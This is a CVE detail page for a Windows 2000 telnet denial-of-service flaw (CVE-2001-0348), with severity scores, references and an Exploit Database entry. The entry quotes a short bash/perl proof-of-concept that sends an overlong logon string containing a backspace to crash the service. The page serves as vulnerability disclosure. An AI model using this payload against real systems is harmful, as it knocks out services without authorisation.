CVE-2001-0348 : Detail

CVE-2001-0348

25.31%V4
Network
2001-09-18
02h00 +00:00
2005-11-02
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Windows 2000 telnet service allows attackers to cause a denial of service (crash) via a long logon command that contains a backspace.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20907

Publication date : 2001-06-06 22h00 +00:00
Author : Michal Zalewski
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2838/info Due to a flaw in the implementation of the telnet service, it is possible for a remote client to perform a denial of service attack against a host. If approximately 4300 characters already exist in the input buffer and additional numerous specially chosen characters are provided, the service will stop responding. #!/bin/bash ( sleep 1 perl -e '{printf "%s\x7f%s","A"x4500,"A"x100}' sleep 3 ) | telnet victimbox - eof -

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

References

http://www.ciac.org/ciac/bulletins/l-092.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.securityfocus.com/bid/2838
Tags : vdb-entry, x_refsource_BID
http://razor.bindview.com/publish/advisories/adv_mstelnet.html
Tags : vendor-advisory, x_refsource_BINDVIEW